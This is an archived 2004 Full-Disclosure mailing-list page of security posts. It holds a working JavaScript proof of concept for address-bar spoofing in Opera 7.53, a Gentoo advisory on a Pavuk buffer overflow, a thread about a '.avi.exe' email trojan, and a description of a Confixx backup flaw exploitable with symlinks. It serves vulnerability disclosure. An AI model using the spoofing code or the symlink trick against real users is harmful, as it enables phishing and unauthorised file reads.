OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  • application/octet-stream attachment: Dog.exe
 
[Full-Disclosure] Opera 7.53 (Build 3850) Address Bar Spoofing Issue

From: bitlance winter (bitlance_3hotmail.com)
Date: Mon Jul 26 2004 - 08:02:11 CDT

Hello List.

I report you about
Opera 7.53 (Build 3850) Address Bar Spoofing Issue,
tested on Windows OS.

==== begin of PoC
[script]
function fake() {
  oc=window.open('http://www.opera.com/', '','location=1');
  oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);"
onClick="fake()"]http://www.opera.com/[/a]
==== end of PoC

Best Regards.

--
bilance winter

_________________________________________________________________
MSN Toolbar provides one-click access to Hotmail from any Web page – FREE
download! http://toolbar.msn.click-url.com/go/onm00200413ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200407-19 ] Pavuk: Digest authentication helper buffer overflow

From: Kurt Lieber (kliebergentoo.org)
Date: Mon Jul 26 2004 - 09:27:00 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Pavuk: Digest authentication helper buffer overflow
      Date: July 26, 2004
        ID: 200407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Pavuk contains a bug that can allow an attacker to run arbitrary code.

Background
==========

Pavuk is web spider and website mirroring tool.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-misc/pavuk <= 0.9.28-r2 >= 0.9.28-r3

Description
===========

Pavuk contains several buffer overflow vulnerabilities in the code
handling digest authentication.

Impact
======

An attacker could cause a buffer overflow, leading to arbitrary code
execution with the rights of the user running Pavuk.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of Pavuk.

Resolution
==========

All Pavuk users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-misc/pavuk-0.9.28-r3"
    # emerge ">=net-misc/pavuk-0.9.28-r3"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBBRS0JPpRNiftIEYRApgIAJ47fuIjJn55WtEbUTzhsXglIn7ejACggLPJ
jHduGxReWb3Y36/J0oJz6t8=
=VD4U
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [ok] [Full-Disclosure] Possible Virus/Trojan

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sun Jul 25 2004 - 22:05:46 CDT

It is a very smooth idea if it is a new e-mail worm. I haven't been able to
find any information from any AV companies on something like this. If it is
some kiddie trying to be smooth with me, this could be a new technique to
come.

-----Original Message-----
From: Andrew Farmer [mailto:andfarmteknovis.com]
Sent: Sunday, July 25, 2004 6:06 PM
To: Curt Purdy
Cc: 'Mailing List - Full-Disclosure'; 'Todd Towles'
Subject: Re: [ok] [Full-Disclosure] Possible Virus/Trojan

On 25 Jul 2004, at 12:06, Curt Purdy wrote:
> Todd Towles wrote:
>> I received an e-mail today that looked very much like a virus. Here
>> is the message
>>
>> Attachment - erupts.avi.exe
>
>> Subject - New Southern California wildfire erupts
>
> <snip>
>
>> Either this is a new Trojan that changes it body and subject based on
>> the current AP news or someone used a very lame trick against me.
>> =)
>
> I'm guessing the latter. Although story scraping would be possible,
> intellegent naming of the .exe would not be. Most likely a friend...
> or
> enemy.

Sure it would be. In this case, at least, the executable is just named
based on the last word of the headline plus ".avi.exe".

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [ok] [Full-Disclosure] Possible Virus/Trojan

From: Willem Koenings (iseceurope.com)
Date: Mon Jul 26 2004 - 08:17:26 CDT

hi,

----------------------------------------

If you spend more on coffee than on IT security, you will be hacked.
What's more, you deserve to be hacked.
-- former White House cybersecurity adviser Richard Clarke
 
btw, is there amount of money or amount of time under a question? :)

willem.
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: FW: [Full-Disclosure] Question for DNS pros

From: Paul Schmehl (paulsutdallas.edu)
Date: Mon Jul 26 2004 - 10:59:43 CDT

--On Monday, July 26, 2004 08:58:48 AM +0200 Paul Rolland <rolwitbe.net>
wrote:

>
> Seems to be a query for the NS for the "." (root) zone.

Well, you're correct about that.

> The machine sending the queries is probably configured to use
> your server as a complete DNS resolver and transfer all its queries
> to your server.
>
Umm...I don't *have* a server at that address. In fact, there is no live
host at all at that address. *That*, after all, is the entire point of
this thread.

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

From: Steven Rakick (stevenrakickyahoo.com)
Date: Mon Jul 26 2004 - 10:56:30 CDT

Hi Heather,

I woudln't worry about it. Our account rep told me
that Intrusense should be releasing nSight 1.2 this
week anyways. I'm sure there will be an evaluation
version available.

Steve

--- "Heather M. Guse Bryan" <hbryandpntech.com>
wrote:
> Unfortunately they closed the beta program.
>
> Too bad, I was interested in it.
>
> -----Original Message-----
> From: Steven Rakick [mailto:stevenrakickyahoo.com]
> Sent: Thursday, July 22, 2004 12:48 PM
> To: full-disclosurelists.netsys.com
> Cc: jeff.gilliangmail.com
> Subject: Re: [Full-Disclosure] Affordable Network
> Behavior Analysis
> alternatives
>
>
> Jeff,
>
> You may want to take a look at the nSight behavior
> analysis product from Intrusense
> (http://www.intrusense.com).
>
> We were actually in a similar bind a while back and
> came across their beta program. We've been using it
> ever since and will be buying it as soon as their
> release version comes out.
>
> It has both standalone and distributed installation
> types and dead simple to install and configure.
> Overall it has less functionality than QRadar but it
> made up for that in cost. While we haven't
> *officially* purchased it yet, we were quoted under
> $10,000 for the distributed version with support for
> 3
> collector agents.
>
> Still too much? You may also want to take a look at
> Snort and Ntop then.
>
> Feel free to email me if you want more details.
>
>
> Steve
>
>
> -------------------------------------------
> Thu, 22 Jul 2004 13:33:15 -0400
> Jeff Gillian jeff.gilliangmail.com wrote:
>
> Hi list,
>
> Since it appears the SecurityFocus Sectools and IDS
> lists are dead, I
> thought I'd repost this here.
>
> I recently saw a posting on FocusIDS regarding the
> high cost of the
> most commercial solutions. The one mentioned was the
> QRadar product
> from Q1Labs. Don't get me wrong, we have a budget,
> we
> just don't have
> a Fortune 500 budget. :)
>
> My question is simple, are there any other
> commercial
> out-of-the-box
> alternatives to QRadar? Something that isn't going
> to
> cost me >$40,000
> to deploy?
>
> Any input would be appreciated.
>
> Regards,
>
> Jeff G.
>
>
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Mail - 50x more storage than other providers!
> http://promotions.yahoo.com/new_mail
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
>

                
__________________________________
Do you Yahoo!?
Yahoo! Mail is new and improved - Check it out!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Security hole in Confixx backup script

From: Dirk Pirschel (dirkpirschel.de)
Date: Mon Jul 26 2004 - 18:57:04 CDT

Hi,

* Dirk Pirschel wrote on Fri, 25 Jun 2004 at 15:08 +0200:

> A malicious backup request via the webinterface might be used by any
> user to read files located in /root (which is the default installation
> directory of confixx).

Confixx does a "cd $dir; tar czf ..." without any error checking. If
the target directory does not exist, the backup is done in the current
working directory, which is /root.

It is possible to retrieve *any* directory by replacing $HOME/files or
$HOME/html with a symlink.

> If you are using confixx, you should disable the backup script.

-Dirk

--
Linux - Life is too short for reboots

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFBBZpPxJ5Dfiog8/YRAjNZAJ40Ge3MrmuFpg+83dU3mPI608zTcQCfYjeC
+2Ti1TG/HpBybdY3NoZlubs=
=h6go
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Simple script to test IE zones

From: BillyBobKnob (billybobknobhotmail.com)
Date: Mon Jul 26 2004 - 11:19:03 CDT

Does anyone have a simple script that can be posted to a static webpage to
test all IE zones for latest vulnerabilities to Active X and Active
Scripting exploits without being intrusive ?

Thanks.
Bill

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re:

From: Thor (thorpivx.com)
Date: Mon Jul 26 2004 - 13:25:43 CDT